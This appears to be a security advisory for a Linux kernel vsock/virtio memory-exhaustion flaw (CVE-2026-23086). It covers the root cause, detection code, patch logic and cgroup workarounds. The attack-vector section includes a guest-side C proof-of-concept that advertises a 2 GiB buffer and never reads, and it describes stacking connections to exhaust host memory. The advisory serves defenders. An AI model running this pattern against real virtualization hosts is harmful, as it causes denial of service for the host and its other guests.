CVE-2026-23086 Overview
A resource exhaustion vulnerability has been identified in the Linux kernel's vsock/virtio transport implementation. The vulnerability exists in how the virtio transport derives its TX credit directly from peer_buf_alloc, which is set from the remote endpoint's SO_VM_SOCKETS_BUFFER_SIZE value. This design flaw allows a malicious guest (or host) to advertise a large buffer and read slowly, forcing the other side to allocate a correspondingly large amount of sk_buff memory, potentially leading to system-wide memory exhaustion and denial of service.
Critical Impact
A malicious virtual machine guest can cause host memory exhaustion by advertising large buffer sizes through vsock connections, potentially leading to system instability or OOM conditions. The same attack is possible from a malicious host targeting guest systems.
Affected Products
- Linux kernel with virtio-vsock transport
- Linux kernel with vhost-vsock transport
- Linux kernel vsock loopback implementation
Discovery Timeline
- 2026-02-04 - CVE-2026-23086 published to NVD
- 2026-02-05 - Last updated in NVD database
Technical Details for CVE-2026-23086
Vulnerability Analysis
The vulnerability resides in the virtio_transport_common.c component of the Linux kernel, which handles vsock communication between virtual machines and their hosts. The core issue is that the TX (transmit) credit mechanism relies entirely on the remote peer's advertised buffer size (peer_buf_alloc) without considering local buffer constraints.
When a remote endpoint (such as a guest VM) advertises an extremely large buffer size via SO_VM_SOCKETS_BUFFER_SIZE, the local endpoint (host) will queue data up to that advertised limit. If the remote endpoint then reads slowly or stops reading entirely, the local endpoint accumulates sk_buff allocations proportional to the peer's advertised buffer—not its own local policy.
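The sketch below illustrates the credit accounting at issue. The field names are modeled on struct virtio_vsock_sock in the upstream kernel (peer_buf_alloc, tx_cnt, peer_fwd_cnt), but the code is a simplified standalone illustration of the logic described above, not the verbatim kernel source. The point it makes is that the free TX window is derived solely from the peer-advertised buffer, so a 2 GiB advertisement translates directly into roughly 2 GiB of data the local side is willing to queue.

/* Simplified illustration of the pre-patch TX credit calculation.
 * Field names are modeled on struct virtio_vsock_sock, but this is a
 * standalone sketch, not the actual kernel code. */
#include <inttypes.h>
#include <stdio.h>

struct vsock_credit_state {
    uint32_t peer_buf_alloc; /* buffer size advertised by the remote peer */
    uint32_t tx_cnt;         /* bytes sent toward the peer                */
    uint32_t peer_fwd_cnt;   /* bytes the peer reports it has consumed    */
};

/* Pre-patch behaviour: the window depends only on what the peer advertises. */
static uint32_t tx_credit_unpatched(const struct vsock_credit_state *s)
{
    return s->peer_buf_alloc - (s->tx_cnt - s->peer_fwd_cnt);
}

int main(void)
{
    /* A peer that advertises 2 GiB and never reads leaves the sender with
     * ~2 GiB of credit, all of which ends up as queued sk_buffs. */
    struct vsock_credit_state s = {
        .peer_buf_alloc = 2U * 1024 * 1024 * 1024,
        .tx_cnt = 0,
        .peer_fwd_cnt = 0,
    };
    printf("TX credit granted by peer: %" PRIu32 " bytes\n",
           tx_credit_unpatched(&s));
    return 0;
}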
In documented testing on an unpatched Ubuntu 22.04 host with approximately 64 GiB of RAM, a proof-of-concept using 32 guest vsock connections—each advertising 2 GiB buffers while reading slowly—drove Slab/SUnreclaim memory from approximately 0.5 GiB to 57 GiB. The system only recovered after the QEMU process was terminated.
Root Cause
The root cause is the absence of local buffer size constraints when calculating TX credits in the virtio vsock transport. The peer_buf_alloc value is accepted at face value from the remote endpoint without being bounded by the local system's own vsock buffer configuration (buf_alloc and buffer_max_size). This violates the principle that a remote peer should not be able to force resource allocation beyond what local policy permits.
Other vsock transports (VMCI and Hyper-V) already implement this boundary correctly—VMCI sizes queue pairs based on local vsk->buffer_* values, and Hyper-V uses fixed-size VMBus ring buffers that cannot be enlarged by remote peers.
Attack Vector
The attack can be executed by any entity with vsock communication access to the target system. In a typical virtualization environment:
- A malicious guest VM establishes multiple vsock connections to the host
- Each connection advertises an extremely large buffer size (e.g., 2 GiB per connection)
- The host begins transmitting data, queuing up to the advertised limits
- The guest intentionally reads slowly or stops reading
- The host accumulates massive sk_buff allocations in kernel slab memory
- With enough connections, this exhausts available host memory, causing system instability or OOM conditions
The attack is bidirectional: a malicious host can target guest systems with the same technique, because the guest-side virtio transport and the host-side vhost transport share the common virtio_transport_common.c code. The sketch below illustrates the guest-side pattern.
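The following guest-side sketch shows the slow-reader pattern described above. The AF_VSOCK socket family, struct sockaddr_vm, and the SO_VM_SOCKETS_BUFFER_SIZE / SO_VM_SOCKETS_BUFFER_MAX_SIZE options are real kernel interfaces, but the port number and overall flow are hypothetical and intended only to clarify the mechanism; it assumes a host-side service is actively streaming data to the guest.

/* Guest-side sketch of the slow-reader pattern described above.
 * Connects to the host over vsock, advertises a 2 GiB receive buffer,
 * then sleeps instead of reading. Port 1234 is an arbitrary example, and
 * the host service on that port is assumed to be sending data. */
#include <stdio.h>
#include <unistd.h>
#include <sys/socket.h>
#include <linux/vm_sockets.h>

int main(void)
{
    int fd = socket(AF_VSOCK, SOCK_STREAM, 0);
    if (fd < 0) { perror("socket"); return 1; }

    /* Advertise an extremely large buffer; pre-patch peers grant TX credit
     * based on this value alone. The max size must be raised first. */
    unsigned long long buf = 2ULL * 1024 * 1024 * 1024;
    if (setsockopt(fd, AF_VSOCK, SO_VM_SOCKETS_BUFFER_MAX_SIZE,
                   &buf, sizeof(buf)) < 0)
        perror("SO_VM_SOCKETS_BUFFER_MAX_SIZE");
    if (setsockopt(fd, AF_VSOCK, SO_VM_SOCKETS_BUFFER_SIZE,
                   &buf, sizeof(buf)) < 0)
        perror("SO_VM_SOCKETS_BUFFER_SIZE");

    struct sockaddr_vm addr = {
        .svm_family = AF_VSOCK,
        .svm_cid = VMADDR_CID_HOST, /* connect to the host */
        .svm_port = 1234,           /* hypothetical service port */
    };
    if (connect(fd, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
        perror("connect");
        return 1;
    }

    /* Never call recv(); the sender keeps queuing sk_buffs up to the
     * advertised 2 GiB window while this process sleeps. */
    pause();
    return 0;
}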
Detection Methods for CVE-2026-23086
Indicators of Compromise
- Unusual growth in kernel slab memory (Slab and SUnreclaim in /proc/meminfo)
- High memory consumption associated with QEMU or other hypervisor processes
- Multiple vsock connections with unusually large advertised buffer sizes
- System memory pressure warnings without corresponding userspace memory growth
Detection Strategies
- Monitor /proc/meminfo for abnormal increases in Slab and SUnreclaim values
- Track vsock connection counts and buffer size negotiations in kernel logs
- Implement memory cgroup limits on virtualization processes to contain potential abuse
- Use kernel tracing tools to monitor calls into the functions implemented in virtio_transport_common.c (see the ftrace sketch below)
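As one way to implement the tracing suggestion above, the sketch below enables ftrace function tracing for the virtio_transport_* symbols through tracefs. It assumes tracefs is mounted at /sys/kernel/tracing, that the kernel was built with the function tracer, and that it runs as root; the exact symbols available for filtering depend on the running kernel.

/* Sketch: enable ftrace function tracing for virtio_transport_* symbols.
 * Assumes tracefs at /sys/kernel/tracing, CONFIG_FUNCTION_TRACER, root. */
#include <stdio.h>
#include <stdlib.h>

static void write_file(const char *path, const char *value)
{
    FILE *f = fopen(path, "w");
    if (!f) { perror(path); exit(1); }
    fputs(value, f);
    fclose(f);
}

int main(void)
{
    write_file("/sys/kernel/tracing/set_ftrace_filter", "virtio_transport_*\n");
    write_file("/sys/kernel/tracing/current_tracer", "function\n");
    write_file("/sys/kernel/tracing/tracing_on", "1\n");
    puts("Tracing virtio_transport_* calls; read /sys/kernel/tracing/trace_pipe");
    return 0;
}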
Monitoring Recommendations
- Set up alerts for rapid kernel memory growth patterns (a minimal monitoring sketch follows this list)
- Monitor hypervisor process memory consumption with defined thresholds
- Implement host-based intrusion detection for unusual vsock activity patterns
- Review guest VM behavior for slow-read or connection-stacking patterns
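The following is a minimal sketch of the Slab/SUnreclaim growth alert mentioned above: it samples /proc/meminfo periodically and warns when unreclaimable slab memory grows faster than a threshold. The threshold and interval values are arbitrary examples and should be tuned per environment.

/* Minimal SUnreclaim growth monitor: samples /proc/meminfo once per
 * interval and warns when unreclaimable slab memory grows faster than a
 * threshold. Threshold and interval values are illustrative only. */
#include <stdio.h>
#include <unistd.h>

static long read_sunreclaim_kb(void)
{
    FILE *f = fopen("/proc/meminfo", "r");
    char line[256];
    long kb = -1;

    if (!f)
        return -1;
    while (fgets(line, sizeof(line), f)) {
        if (sscanf(line, "SUnreclaim: %ld kB", &kb) == 1)
            break;
    }
    fclose(f);
    return kb;
}

int main(void)
{
    const long threshold_kb = 512 * 1024; /* warn on >512 MiB growth per interval */
    const unsigned interval_s = 10;
    long prev = read_sunreclaim_kb();

    while (prev >= 0) {
        sleep(interval_s);
        long cur = read_sunreclaim_kb();
        if (cur < 0)
            break;
        if (cur - prev > threshold_kb)
            printf("WARNING: SUnreclaim grew by %ld kB in %us (now %ld kB)\n",
                   cur - prev, interval_s, cur);
        prev = cur;
    }
    return 0;
}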
How to Mitigate CVE-2026-23086
Immediate Actions Required
- Apply the kernel patches from the official Linux kernel git repository
- Configure memory cgroups to limit QEMU/hypervisor process memory usage
- Review and reduce buffer_max_size vsock settings where possible
- Monitor systems for signs of exploitation while patches are deployed
Patch Information
The vulnerability has been addressed through multiple kernel commits that introduce a new helper function, virtio_transport_tx_buf_size(), which returns min(peer_buf_alloc, buf_alloc). This ensures the effective TX window is bounded by both the peer's advertised buffer and the local buf_alloc (already clamped to buffer_max_size via SO_VM_SOCKETS_BUFFER_MAX_SIZE).
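The sketch below shows the shape of the described fix. It follows the commit description above (bounding the TX window by the smaller of the peer's advertisement and the local allocation) but is a simplified illustration, not the verbatim upstream implementation; the 256 KiB local value is only an example.

/* Simplified illustration of the fix described above: the TX window is
 * bounded by the smaller of the peer-advertised buffer and the local
 * buf_alloc (itself clamped to buffer_max_size). Not the verbatim
 * upstream implementation. */
#include <inttypes.h>
#include <stdio.h>

struct vsock_credit_state {
    uint32_t peer_buf_alloc; /* advertised by the remote peer             */
    uint32_t buf_alloc;      /* local allocation, bounded by local policy */
    uint32_t tx_cnt;
    uint32_t peer_fwd_cnt;
};

static uint32_t tx_buf_size(const struct vsock_credit_state *s)
{
    return s->peer_buf_alloc < s->buf_alloc ? s->peer_buf_alloc : s->buf_alloc;
}

/* Patched credit calculation: a peer can no longer inflate the window
 * beyond what local configuration permits. */
static uint32_t tx_credit_patched(const struct vsock_credit_state *s)
{
    return tx_buf_size(s) - (s->tx_cnt - s->peer_fwd_cnt);
}

int main(void)
{
    struct vsock_credit_state s = {
        .peer_buf_alloc = 2U * 1024 * 1024 * 1024, /* attacker-advertised      */
        .buf_alloc = 256 * 1024,                   /* example local allocation */
    };
    printf("effective TX window: %" PRIu32 " bytes, credit: %" PRIu32 " bytes\n",
           tx_buf_size(&s), tx_credit_patched(&s));
    return 0;
}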
Patches are available from the official kernel git repository:
- Kernel Git Commit 84ef86aa
- Kernel Git Commit 8ee784fd
- Kernel Git Commit c0e42fb0
- Kernel Git Commit d9d5f222
With the patch applied, testing showed an increase of only approximately 35 MiB in Slab/SUnreclaim under the same attack conditions that previously consumed more than 56 GiB.
Workarounds
- Apply memory cgroup limits to hypervisor processes to cap maximum memory consumption
- Reduce SO_VM_SOCKETS_BUFFER_MAX_SIZE on host systems to limit maximum queue sizes
- Restrict vsock access to trusted guests only where possible
- Monitor and alert on unusual memory consumption patterns in virtualization environments
# Configuration example - Limit QEMU memory with cgroups
# Create a cgroup for QEMU processes
mkdir -p /sys/fs/cgroup/memory/qemu
# Set memory limit (e.g., 8GB)
echo 8589934592 > /sys/fs/cgroup/memory/qemu/memory.limit_in_bytes
# Add QEMU process to cgroup
echo $QEMU_PID > /sys/fs/cgroup/memory/qemu/cgroup.procs
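Note that the snippet above uses the legacy cgroup v1 memory controller; on cgroup v2 hosts the equivalent limit is written to memory.max. For the buffer-size workaround, host-side applications that own vsock sockets can also cap their per-socket allocation explicitly. The sketch below assumes a hypothetical host service that owns the listening socket; the 64 KiB cap and port number are arbitrary example values.

/* Sketch: a host-side vsock service capping its own per-socket buffer via
 * SO_VM_SOCKETS_BUFFER_MAX_SIZE / SO_VM_SOCKETS_BUFFER_SIZE before use.
 * The 64 KiB cap and port 1234 are illustrative only. */
#include <stdio.h>
#include <sys/socket.h>
#include <linux/vm_sockets.h>

int main(void)
{
    int fd = socket(AF_VSOCK, SOCK_STREAM, 0);
    if (fd < 0) { perror("socket"); return 1; }

    unsigned long long cap = 64 * 1024; /* example: 64 KiB cap */
    if (setsockopt(fd, AF_VSOCK, SO_VM_SOCKETS_BUFFER_MAX_SIZE,
                   &cap, sizeof(cap)) < 0)
        perror("SO_VM_SOCKETS_BUFFER_MAX_SIZE");
    if (setsockopt(fd, AF_VSOCK, SO_VM_SOCKETS_BUFFER_SIZE,
                   &cap, sizeof(cap)) < 0)
        perror("SO_VM_SOCKETS_BUFFER_SIZE");

    struct sockaddr_vm addr = {
        .svm_family = AF_VSOCK,
        .svm_cid = VMADDR_CID_ANY,
        .svm_port = 1234, /* hypothetical service port */
    };
    if (bind(fd, (struct sockaddr *)&addr, sizeof(addr)) < 0 ||
        listen(fd, 8) < 0) {
        perror("bind/listen");
        return 1;
    }
    /* accept() loop omitted; accepted sockets generally inherit the
     * listener's buffer settings. */
    return 0;
}

None of these workarounds replaces patching; they only limit how much memory a single misbehaving peer can pin until the kernel fix is deployed.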